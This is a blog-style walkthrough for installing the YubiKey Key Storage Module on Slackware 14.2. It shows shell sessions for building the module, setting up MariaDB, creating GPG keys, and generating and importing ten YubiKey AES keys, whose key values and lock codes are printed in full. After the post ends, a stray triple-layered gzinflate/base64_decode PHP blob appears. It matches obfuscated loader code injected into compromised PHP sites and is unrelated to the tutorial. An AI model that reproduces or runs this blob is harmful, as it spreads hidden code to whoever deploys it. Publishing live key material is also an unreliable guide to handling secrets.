slackware-14.2 yubikey Key-Storage-Module

  ozzie / 21/12/2017

Slackware Linux
Apache, PHP, MySQL, OpenPGP

Download source

root@badak1:~# git clone
Cloning into 'yubikey-ksm'...
remote: Counting objects: 681, done.
remote: Total 681 (delta 0), reused 0 (delta 0), pack-reused 681
Receiving objects: 100% (681/681), 133.22 KiB | 154.00 KiB/s, done.
Resolving deltas: 100% (398/398), done.
Checking connectivity... done.

edit Makefile

root@badak1:~# cd yubikey-ksm/
root@badak1:~/yubikey-ksm# vi Makefile


wwwgroup = www-data
wwwprefix = /var/www/wsapi


wwwgroup = apache
wwwprefix = /var/www/htdocs/wsapi

Build & Install

root@badak1:~/yubikey-ksm# make install
install -D --mode 640 .htaccess /usr/share/yubikey-ksm/.htaccess
install -D --mode 640 ykksm-decrypt.php /usr/share/yubikey-ksm/ykksm-decrypt.php
install -D --mode 640 ykksm-utils.php /usr/share/yubikey-ksm/ykksm-utils.php
install -D ykksm-gen-keys /usr/bin/ykksm-gen-keys
install -D ykksm-import /usr/bin/ykksm-import
install -D ykksm-export /usr/bin/ykksm-export
install -D ykksm-checksum /usr/bin/ykksm-checksum
install -D --backup --mode 640 --group apache ykksm-config.php /etc/yubico/ksm/ykksm-config.php
install -D ykksm-gen-keys.1 /usr/share/man/man1/ykksm-gen-keys.1
install -D ykksm-import.1 /usr/share/man/man1/ykksm-import.1
install -D ykksm-export.1 /usr/share/man/man1/ykksm-export.1
install -D ykksm-checksum.1 /usr/share/man/man1/ykksm-checksum.1
install -D ykksm-db.sql /usr/share/doc/yubikey-ksm/ykksm-db.sql
install -D Makefile /usr/share/doc/yubikey-ksm/
install -D doc/Decryption_Protocol.adoc doc/Design_Goals.adoc doc/Generate_Keys.adoc 
doc/Generate_KSM_Key.adoc doc/Import_Keys_To_KSM.adoc doc/Installation.adoc 
doc/Key_Provisioning_Format.adoc doc/Server_Hardening.adoc doc/Sync_Monitor.adoc 

Configure & Import MySQL

root@badak1:~# mysql_install_db --user=mysql
root@badak1:~# chmod 755 /etc/rc.d/rc.mysqld
root@badak1:~# /etc/rc.d/rc.mysqld  start
root@badak1:~# mysql -u root -p
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 3
Server version: 10.0.26-MariaDB MariaDB Server
Copyright (c) 2000, 2016, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> create database ykksm;
Query OK, 1 row affected (0.00 sec)
MariaDB [(none)]> \q
root@badak1:~# mysql -u root -p ykksm < /usr/share/doc/yubikey-ksm/ykksm-db.sql

Edit php.ini

include_path = "/etc/yubico/ksm:/usr/share/yubikey-ksm"

Install OTP

root@badak1:~/yubikey-ksm# make -f /usr/share/doc/yubikey-ksm/ symlink
install -d /var/www/htdocs/wsapi
ln -sf /usr/share/yubikey-ksm/.htaccess /var/www/htdocs/wsapi/.htaccess
ln -sf /usr/share/yubikey-ksm/ykksm-decrypt.php /var/www/htdocs/wsapi/decrypt.php

Generate KSM Key

root@badak1:~# gpg --gen-key
gpg (GnuPG) 1.4.20; Copyright (C) 2015 Free Software Foundation, Inc.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
gpg: directory `/root/.gnupg' created
gpg: new configuration file `/root/.gnupg/gpg.conf' created
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/root/.gnupg/secring.gpg' created
gpg: keyring `/root/.gnupg/pubring.gpg' created
Please select what kind of key you want:
   (1) RSA and RSA (default)
   (2) DSA and Elgamal
   (3) DSA (sign only)
   (4) RSA (sign only)
Your selection? 1
RSA keys may be between 1024 and 4096 bits long.
What keysize do you want? (2048)
Requested keysize is 2048 bits
Please specify how long the key should be valid.
         0 = key does not expire
      <n>  = key expires in n days
      <n>w = key expires in n weeks
      <n>m = key expires in n months
      <n>y = key expires in n years
Key is valid for? (0)
Key does not expire at all
Is this correct? (y/N) Y
You need a user ID to identify your key; the software constructs the user ID
from the Real Name, Comment and Email Address in this form:
    "Heinrich Heine (Der Dichter) <>"
Real name: ozzienich
Email address:
Comment: --
You selected this USER-ID:
    "ozzienich (--) <>"
Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
You need a Passphrase to protect your secret key.
gpg: /root/.gnupg/trustdb.gpg: trustdb created
gpg: key 654FBFAC marked as ultimately trusted
public and secret key created and signed.
gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0  valid:   1  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 1u
pub   2048R/654FBFAC 2017-12-21
      Key fingerprint = 573F 524E 5A53 C893 87E4  AA47 5D00 059F 654F BFAC
uid                  ozzienich (--) <>
sub   2048R/EA96F715 2017-12-21
root@badak1:~# gpg --list-key
pub   2048R/654FBFAC 2017-12-21
uid                  ozzienich (--) <>
sub   2048R/EA96F715 2017-12-21

Generate Keys

root@badak1:~# ykksm-gen-keys --urandom 1 10 | gpg -a --encrypt -r 654FBFAC  -s > keys.txt
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID 654FBFAC, created 2017-12-21
root@badak1:~# gpg < keys.txt
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID EA96F715, created 2017-12-21 (main key ID 654FBFAC)
gpg: encrypted with 2048-bit RSA key, ID EA96F715, created 2017-12-21
      "ozzienich (--) <>"
# ykksm 1
# serialnr,identity,internaluid,aeskey,lockpw,created,accessed[,progflags]
# the end
gpg: Signature made Thu 21 Dec 2017 03:38:02 PM WIB using RSA key ID 654FBFAC
gpg: Good signature from "ozzienich (--) <>"

Import Keys To Yubikey KSM

root@badak1:~# ykksm-import --verbose --database 'DBI:mysql:dbname=ykksm;host=localhost' --db-user XXXX --db-passwd XXXX < ~/keys.txt
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID EA96F715, created 2017-12-21 (main key ID 654FBFAC)
Verification output:
[GNUPG:] ENC_TO F13DAD25EA96F715 1 0
[GNUPG:] USERID_HINT F13DAD25EA96F715 ozzienich (--) <>
gpg: encrypted with 2048-bit RSA key, ID EA96F715, created 2017-12-21
      "ozzienich (--) <>"
[GNUPG:] PLAINTEXT 62 1513845482
gpg: Signature made Thu 21 Dec 2017 03:38:02 PM WIB using RSA key ID 654FBFAC
[GNUPG:] SIG_ID tYngCEEO/FWR5YCuKihwjTajxo0 2017-12-21 1513845482
[GNUPG:] GOODSIG 5D00059F654FBFAC ozzienich (--) <>
gpg: Good signature from "ozzienich (--) <>"
[GNUPG:] VALIDSIG 573F524E5A53C89387E4AA475D00059F654FBFAC 2017-12-21 1513845482 0 4 0 1 8 00 573F524E5A53C89387E4AA475D00059F654FBFAC
encrypted to: F13DAD25EA96F715
signed by: 654FBFAC
You need a passphrase to unlock the secret key for
user: "ozzienich (--) <>"
2048-bit RSA key, ID EA96F715, created 2017-12-21 (main key ID 654FBFAC)
line: 1,cccccccccccb,8f571fa25058,fb97d03b7126d1cde2437a9dedac3f28,581a6c4ed37e,2017-12-21T15:38:02,
        serialnr 1 publicname cccccccccccb internalname 8f571fa25058 aeskey fb97d03b7126d1cde2437a9dedac3f28 
lockcode 581a6c4ed37e created 2017-12-21T15:38:02 accessed  eol
line: 2,cccccccccccd,5b77a49decb3,0f6d2512cd851fecf62ac563ed6a8a28,2494828d32a8,2017-12-21T15:38:02,
        serialnr 2 publicname cccccccccccd internalname 5b77a49decb3 aeskey 0f6d2512cd851fecf62ac563ed6a8a28 
lockcode 2494828d32a8 created 2017-12-21T15:38:02 accessed  eol
line: 3,ccccccccccce,5fb827ac0f57,09857027dd82a0ac835701cd54fe4b7d,c18b216cfa9c,2017-12-21T15:38:02,
        serialnr 3 publicname ccccccccccce internalname 5fb827ac0f57 aeskey 09857027dd82a0ac835701cd54fe4b7d 
lockcode c18b216cfa9c created 2017-12-21T15:38:02 accessed  eol
line: 4,cccccccccccf,33fb7d3c6875,fdf7bdc7af6f84fece2d8d3e36e2da37,dc7191563906,2017-12-21T15:38:02,
        serialnr 4 publicname cccccccccccf internalname 33fb7d3c6875 aeskey fdf7bdc7af6f84fece2d8d3e36e2da37 
lockcode dc7191563906 created 2017-12-21T15:38:02 accessed  eol
line: 5,cccccccccccg,df3e9f911fbe,455acd1d2ce2297964dd003af33651f4,f0ef56b46c92,2017-12-21T15:38:02,
        serialnr 5 publicname cccccccccccg internalname df3e9f911fbe aeskey 455acd1d2ce2297964dd003af33651f4 
lockcode f0ef56b46c92 created 2017-12-21T15:38:02 accessed  eol
line: 6,ccccccccccch,2c525fc6fbd6,6412532c160cb7a66c69d79372d84115,da95b9e2b6ce,2017-12-21T15:38:02,
        serialnr 6 publicname ccccccccccch internalname 2c525fc6fbd6 aeskey 6412532c160cb7a66c69d79372d84115 
lockcode da95b9e2b6ce created 2017-12-21T15:38:02 accessed  eol
line: 7,ccccccccccci,acfab204f600,aea86d571d39224d9eadc7c1a323b5f2,22d8ddbee8e2,2017-12-21T15:38:02,
        serialnr 7 publicname ccccccccccci internalname acfab204f600 aeskey aea86d571d39224d9eadc7c1a323b5f2 
lockcode 22d8ddbee8e2 created 2017-12-21T15:38:02 accessed  eol
line: 8,cccccccccccj,bd602f2c5a0b,1407a47e262a4d5e42d2c9dd0529a95f,f351df3fea41,2017-12-21T15:38:02,
        serialnr 8 publicname cccccccccccj internalname bd602f2c5a0b aeskey 1407a47e262a4d5e42d2c9dd0529a95f 
lockcode f351df3fea41 created 2017-12-21T15:38:02 accessed  eol
line: 9,ccccccccccck,9f674f8d73f2,f27505d5deda0c4dc33764e7bf009afa,537c32f72293,2017-12-21T15:38:02,
        serialnr 9 publicname ccccccccccck internalname 9f674f8d73f2 aeskey f27505d5deda0c4dc33764e7bf009afa 
lockcode 537c32f72293 created 2017-12-21T15:38:02 accessed  eol
line: 10,cccccccccccl,ae986cf8f6d6,84cc170bc1c9e4c9381a6cca46140bac,75aeb77c0c20,2017-12-21T15:38:02,
        serialnr 10 publicname cccccccccccl internalname ae986cf8f6d6 aeskey 84cc170bc1c9e4c9381a6cca46140bac 
lockcode 75aeb77c0c20 created 2017-12-21T15:38:02 accessed  eol

« »

".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>